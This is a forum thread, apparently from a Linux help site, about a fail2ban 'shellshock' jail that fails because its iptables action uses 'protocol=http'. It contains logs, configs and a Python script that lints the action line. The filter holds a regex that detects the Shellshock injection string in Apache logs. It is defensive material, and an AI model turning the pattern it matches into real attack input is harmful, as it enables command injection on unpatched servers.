2014-10-22 00:14:37,822 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail   : INFO   Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail   : INFO   Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail   : INFO   Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail   : INFO   Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail   : INFO   Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail   : INFO   Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO   Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO   Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO   Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail   : INFO   Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail   : INFO   Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO   Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail   : INFO   Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail   : INFO   Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail   : INFO   Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail   : INFO   Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail   : INFO   Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail   : INFO   Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail   : INFO   Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail   : INFO   Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail   : INFO   Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,627 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog

I go and install on a newer setup and I get an error:

# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO   Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO   Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR  iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail   : INFO   Jail 'asterisk-iptables' started
 
Old 10-25-2014, 11:36 AM   #13
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
If it matters, I had no error before; here are the settings.

# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
#before = common.conf

[Definition]
#_daemon = apache2

docroot = /var/www/html

failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
cat /etc/fail2ban/jail.local

Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = iptables[name=shellshock, port=http, protocol=http]
          mail-whois[name=shellshock, dest=fail2ban@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime = 259200
log
cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:35:46,834 fail2ban.filter : INFO   Set findtime = 600
2014-10-25 12:35:46,834 fail2ban.actions: INFO   Set banTime = 259200
2014-10-25 12:35:46,893 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-25 12:35:46,917 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-25 12:35:46,935 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-25 12:35:46,970 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-25 12:35:46,980 fail2ban.actions.action: ERROR  iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:35:46,997 fail2ban.jail   : INFO   Jail 'asterisk-iptables' started
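The error in the two logs above is visible in the command fail2ban reports: `iptables -I INPUT -p http --dport http -j fail2ban-shellshock`. The jail's action line says `protocol=http`, fail2ban substitutes it into the `-p <protocol>` tag, and iptables has no protocol named http (a service name such as http belongs to `--dport`; `-p` takes tcp, udp, icmp and the other names from /etc/protocols). As an added example that is neither the thread's nor fail2ban's own code, the script below parses a jail's action value, renders the three actionstart commands exactly as they appear in the log, and lints the protocol parameter. The actionstart templates are those of fail2ban 0.8's action.d/iptables.conf as I recall them (they match the logged commands line for line); the defaults for name, port and protocol are assumed and should be checked against your own iptables.conf.

```python
import re

# The three commands fail2ban 0.8's action.d/iptables.conf runs as actionstart, with the
# <name>, <port> and <protocol> tags filled in from the jail's action line. They are the
# same three commands the thread's fail2ban.log shows failing.
ACTIONSTART = (
    "iptables -N fail2ban-<name>",
    "iptables -A fail2ban-<name> -j RETURN",
    "iptables -I INPUT -p <protocol> --dport <port> -j fail2ban-<name>",
)

# Defaults from the action's [Init] section (assumed here; check your own iptables.conf).
ACTION_DEFAULTS = {"name": "default", "port": "ssh", "protocol": "tcp"}

# Protocol names iptables -p accepts (numeric values and other /etc/protocols names are
# also valid; this lint checks the common names only).
IPTABLES_PROTOCOLS = {"tcp", "udp", "udplite", "icmp", "icmpv6", "esp", "ah", "sctp", "mh", "all"}

# One action spec, e.g. iptables[name=shellshock, port=http, protocol=http]
ACTION_SPEC_RE = re.compile(r"^(?P<action>[\w.-]+)(?:\[(?P<params>[^\]]*)\])?$")


def parse_action_specs(action_value):
    """Split a jail's (possibly multi-line) action value into (action, params) pairs."""
    specs = []
    for raw in action_value.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        m = ACTION_SPEC_RE.match(raw)
        if m is None:
            raise ValueError("unparseable action spec: " + raw)
        params = {}
        for item in (m.group("params") or "").split(","):
            if item.strip():
                key, _, value = item.partition("=")
                params[key.strip()] = value.strip()
        specs.append((m.group("action"), params))
    return specs


def render_actionstart(params):
    """Fill the tags the way fail2ban does, giving the exact command lines it will run."""
    values = {**ACTION_DEFAULTS, **params}
    rendered = []
    for template in ACTIONSTART:
        cmd = template
        for tag, value in values.items():
            cmd = cmd.replace("<" + tag + ">", value)
        rendered.append(cmd)
    return rendered


def lint_jail_actions(action_value):
    """Return a human-readable problem for every iptables-style action with a bad protocol."""
    problems = []
    for action, params in parse_action_specs(action_value):
        if not action.startswith("iptables"):
            continue  # mail-whois and friends never touch iptables
        proto = params.get("protocol", ACTION_DEFAULTS["protocol"])
        port = params.get("port", ACTION_DEFAULTS["port"])
        if proto not in IPTABLES_PROTOCOLS:
            problems.append(
                f"{action}: protocol={proto!r} is not an iptables protocol, so "
                f"'iptables -p {proto}' fails; use protocol=tcp for HTTP/HTTPS "
                f"(port={port!r} is fine for --dport)."
            )
    return problems


# The action value from charly78's jail.local (post #13) and a corrected version of it.
BROKEN_ACTION = """iptables[name=shellshock, port=http, protocol=http]
          mail-whois[name=shellshock, dest=fail2ban@mydomain.com]"""
FIXED_ACTION = """iptables[name=shellshock, port=http, protocol=tcp]
          mail-whois[name=shellshock, dest=fail2ban@mydomain.com]"""

if __name__ == "__main__":
    for label, value in (("broken", BROKEN_ACTION), ("fixed", FIXED_ACTION)):
        iptables_params = parse_action_specs(value)[0][1]
        print(f"{label} actionstart:")
        for cmd in render_actionstart(iptables_params):
            print("  " + cmd)
        print("  problems:", lint_jail_actions(value) or "none")
```

The broken value renders the same `-p http` command the log shows; with `protocol=tcp` the rendered rule is one iptables accepts. If you want both ports from `port = http,https` covered by the firewall rule rather than only http, the `iptables-multiport` action takes a comma-separated port list, where the plain `iptables` action takes a single port.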
 
  

